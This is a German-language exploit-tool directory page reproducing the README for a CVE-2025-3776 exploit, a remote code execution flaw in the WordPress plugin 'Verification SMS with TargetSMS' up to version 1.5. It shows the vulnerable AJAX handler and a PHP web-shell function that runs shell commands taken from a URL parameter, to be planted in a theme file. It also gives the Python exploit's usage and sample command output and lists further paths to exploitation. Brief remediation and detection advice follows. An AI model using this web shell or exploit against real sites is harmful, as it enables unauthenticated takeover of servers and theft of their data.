Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-3776 — Das WordPress-Plugin „Verification SMS with TargetSMS“ <= 1.5 ist anfällig für Remote Code Execution (RCE) | Kitploit
Tools/GitHubGitHub/nxploited/cve-2025-3776
SchwachstellenanalyseCode-AnalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubnxploited/cve-2025-3776

CVE-2025-3776

Das WordPress-Plugin „Verification SMS with TargetSMS“ <= 1.5 ist anfällig für Remote Code Execution (RCE)

Repository anzeigen
711vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-3776 - Remote-Code-Ausführung im Plugin "Verification SMS with TargetSMS" <= 1.5

Plugin-Informationen

  • Plugin-Name: Verification SMS with TargetSMS
  • Verwundbare Versionen: <= 1.5
  • CVE-ID: CVE-2025-3776
  • Typ: Remote-Code-Ausführung (RCE)
  • OWASP-Klassifizierung: A1: Injection
  • CVSS-Schweregrad: 10.0 (Kritisch)
  • Erforderliche Berechtigungen: Nicht authentifiziert
  • Veröffentlichungsdatum: 23. April 2025

Grundursache: Programmierfehler

Die Schwachstelle entsteht durch die Verwendung von call_user_func() auf benutzergesteuerte Eingaben ohne Überprüfung gegen eine Whitelist erlaubter Funktionen. Dies erzeugt einen logischen Fehler, bei dem jede vorhandene PHP-Funktion im Speicher ohne Authentifizierung ausgeführt werden kann, was zu einer schwerwiegenden Remote-Code-Ausführung (RCE) führt.

Anfällige Codestelle

Datei: /inc/ajax.php

root@kitploit:~
add_action('wp_ajax_nopriv_targetvrHHndler', 'targetvr_ajax_handler');

function targetvr_ajax_handler(){
    $callback = targetvr_get_postData('callback', 'string');

    if ($callback and function_exists($callback)){
        call_user_func($callback);
    } else {
        targetvr_return_json(false);
    }

    wp_die();
}

Dieser Code ermöglicht es nicht authentifizierten Benutzern, jede im Speicher vorhandene Funktion auszulösen, einschließlich schädlicher, wenn der Angreifer sie laden kann.


So testen Sie diese Schwachstelle

✅ Voraussetzungen

Um diese Schwachstelle erfolgreich auszunutzen, muss bereits eine aufrufbare Funktion in der WordPress-Umgebung vorhanden sein. Da WordPress-Plugins und -Themes Funktionen automatisch laden können, kann der Angreifer seine eigene Funktion über die functions.php-Datei des aktiven Themes einschleusen.

📍 Zu bearbeitende Datei:

root@kitploit:~
target.com/wp-content/themes/twentytwentyfour/functions.php

🛠️ Fügen Sie am Ende von functions.php den folgenden Payload ein:

root@kitploit:~
function evil() {
    if (isset($_GET['cmd'])) {
        echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';
    } else {
        echo '<pre>' . shell_exec("whoami") . '</pre>';
    }
    exit;
}

✅ Dadurch wird sichergestellt, dass die Funktion evil() in den Speicher geladen und über call_user_func() ausführbar wird.


Ausnutzungsschritte mit Python-Skript

✅ Verwendung:

root@kitploit:~
python3 CVE-2025-3776.py -u http://target.com -c "id"

✅ Beispielausgabe:

root@kitploit:~
[*] Checking plugin version...
[+] Plugin version detected: 1.5
[+] Plugin is vulnerable. Proceeding with exploitation...
[*] Sending exploit request...
[+] Exploit succeeded!
<pre>uid=1(daemon) gid=1(daemon) groups=1(daemon)</pre>

Exploit By : Nxploited ( Khaled Alenazi )

Hilfemenü des Python-Skripts:

root@kitploit:~
usage: CVE-2025-3776.py [-h] -u URL [-c CMD]

CVE-2025-3776 Exploit for TargetSMS Plugin <= 1.5

# Exploit by Nxploited ( Khaled Alenazi )

options:
  -h, --help     show this help message and exit
  -u, --url URL  Target WordPress site URL
  -c, --cmd CMD  Command to execute (default: whoami)

Verhalten ohne Injection

Wenn keine evil()-Funktion oder ähnliches im Speicher verfügbar ist:

  • Die Anfrage führt zu:
root@kitploit:~
{"status":false}
  • Dies bedeutet, dass die Callback-Funktion nicht existiert und der Exploit sicher fehlschlägt.

Reale Ausnutzungspfade

  • Theme-Datei-Injection: Ändern Sie die functions.php des aktiven Themes (wie gezeigt).
  • Über Dateimanager-Plugins: Verwenden Sie ein Plugin wie WP File Manager, um eine PHP-Datei mit evil() hochzuladen.
  • Über LFI- oder Include-Fehler: Nutzen Sie eine bestehende Local File Inclusion (LFI) aus, um eine hochgeladene Datei mit einer schädlichen Funktion einzubinden.

Risiko und Auswirkungen

Sobald eine schädliche Funktion geladen ist, kann ein nicht authentifizierter Angreifer:

  • Beliebige Shell-Befehle ausführen
  • Vertrauliche Serverdateien anzeigen
  • Zu einer vollständigen Kompromittierung der Website oder des Servers übergehen

Empfehlung

  • Deaktivieren oder entfernen Sie das Plugin sofort, wenn Version <= 1.5 ausgeführt wird
  • Schränken Sie den Zugriff auf die Dateibearbeitung über wp-admin ein
  • Patchen oder ersetzen Sie das Plugin durch sichere Alternativen

Erkennung

Achten Sie auf wiederholte POST-Anfragen an:

root@kitploit:~
/wp-admin/admin-ajax.php?action=targetvrHHndler

Mit callback=evil oder unerwarteten Funktionsnamen


Rechtlicher Hinweis

Diese Informationen werden ausschließlich zu Bildungs- und ethischen Forschungszwecken bereitgestellt. Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch die Verwendung dieser Informationen entstehen.


Exploit-Zuschreibung

Exploit By: Nxploited (Khaled Alenazi)

Tool herunterladen